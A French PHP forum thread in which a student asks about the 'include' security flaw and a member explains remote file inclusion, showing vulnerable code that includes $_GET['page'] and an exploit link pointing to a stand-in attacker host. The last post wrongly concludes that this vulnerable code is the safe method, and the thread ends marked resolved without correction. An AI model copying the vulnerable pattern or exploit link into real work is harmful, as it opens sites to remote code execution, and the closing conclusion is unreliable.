IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

[Sécurité] La faille include


Sujet :

Langage PHP

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
  1. #1
    Membre confirmé
    Profil pro
    Étudiant
    Inscrit en
    Mai 2008
    Messages
    56
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Étudiant

    Informations forums :
    Inscription : Mai 2008
    Messages : 56
    Par défaut [Sécurité] La faille include
    bonjour.
    premier message sur ce forum donc je me présente: arnaud 19 ans, bases sup dans le php.
    Mon problème du jour: résoudre la faille d'include: en effet sur mon site je met des include pour me connecter à ma base de donnée ect ect les fichiers à protéger se trouvent donc dans un dossier protéger pas mot de passe (htacces ect ect).
    Hors en parlant avec une personne qui se débrouille mieux que moi il m'a fait penser au fait que la personne peut en voyant tout simplement mon code utiliser le fichier appelé par un adressage du type http://arnaudinnsert.com/protect/connection.php dans un include

    comment résoudre cette faille??
    merci de votre aide

  2. #2
    Inactif
    Profil pro
    Inscrit en
    Mai 2008
    Messages
    179
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2008
    Messages : 179
    Par défaut
    Il marche comment, ton système d'include ?

    Suffit de contrôler ce que tu inclus, pour être sûr qu'il s'agisse d'un script destiné à l'être.

  3. #3
    Membre Expert

    Profil pro
    Inscrit en
    Mai 2008
    Messages
    1 576
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2008
    Messages : 1 576
    Par défaut
    Bonsoir,
    Comment une personne pourrait-elle voir ton code ?
    A moins que tu ne fasses passer le nom et l'adresse de tes pages à inclure directement dans l'url ? Il vaut mieux éviter ce dernier cas, même si, correctement filtré, rien ne passera.

  4. #4
    Membre confirmé
    Profil pro
    Étudiant
    Inscrit en
    Mai 2008
    Messages
    56
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Étudiant

    Informations forums :
    Inscription : Mai 2008
    Messages : 56
    Par défaut
    merci pour vos réponses .
    Alors pour la question de comment on peut voir mon code: il parait que voir du php c'est possible justement en utilisant la même faille.
    j'urilise include comme suis dans ma page php (qui n'est pas dans un dossier protéger)
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    include("secure/connect.php");
    include("secure/suis.php");

  5. #5
    Membre Expert

    Profil pro
    Inscrit en
    Mai 2008
    Messages
    1 576
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2008
    Messages : 1 576
    Par défaut
    Une page php n'est normalement pas lisible à partir d'un simple navigateur. Si c'est le cas, ce n'est plus un problème php, c'est une défaillance (grave !) du serveur.
    La faille 'include', dans sa version la plus brute (et simplifiée) consiste en ceci :
    le lien utilisé pour ouvrir la page :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <a href="index.php?page=include.php">
    le traitement effectué dans la page index.php
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
     
    <?php
    include($_GET['page']); //affiche la page dans la page en cours
    ?>
    Exploitation de la faille :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <a href="index.php?page=http://www.grandmechantpirate.ru/mechant.php">
    Conséquence: dès qu'on clique sur le lien, la page http://www.grandmechantpirate.ru/mechant.php est incluse, ce qui permet au grand méchant pirate de faire à peu ce qu'il veut (suivant la configuation de sécurité du serveur), depuis le défaçage de site jusqu'à la lecture du fichier de mots de passe, etc..

    La solution consiste simplement à ne jamais faire confiance à tout ce qui provient de l'extérieur, et donc à filtrer soigneusement toute requête GET ou POST, ainsi qu'à ne pas utiliser des indications aussi précises que '?page=' ou 'include=' suivi d'un nom de fichier.

  6. #6
    Membre confirmé
    Profil pro
    Étudiant
    Inscrit en
    Mai 2008
    Messages
    56
    Détails du profil
    Informations personnelles :
    Âge : 36
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Étudiant

    Informations forums :
    Inscription : Mai 2008
    Messages : 56
    Par défaut
    OK pour ne pas avoir de problème au niveau sécurité avec mes includes il me suffit donc d'utiliser la deuxième méthode c à d:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    <?php
    include($_GET['page']); //affiche la page dans la page en cours
    ?>
    ?
    merci de ton aide

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Réponses: 12
    Dernier message: 16/03/2011, 07h56
  2. [TinyMCE] Sécurité : faille XSS et upload de fichiers malicieux pour l'insertion d'image
    Par Lucas Panny dans le forum Bibliothèques & Frameworks
    Réponses: 9
    Dernier message: 21/01/2011, 11h33
  3. Sécurité de l'include
    Par nasuu dans le forum Langage
    Réponses: 3
    Dernier message: 14/07/2010, 03h00
  4. Faille Include
    Par xxkirastarothxx dans le forum Langage
    Réponses: 3
    Dernier message: 18/04/2009, 21h03
  5. [Sécurité] Les failles les plus courantes
    Par Lootro dans le forum Contribuez / Téléchargez Sources et Outils
    Réponses: 94
    Dernier message: 11/02/2008, 09h43

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo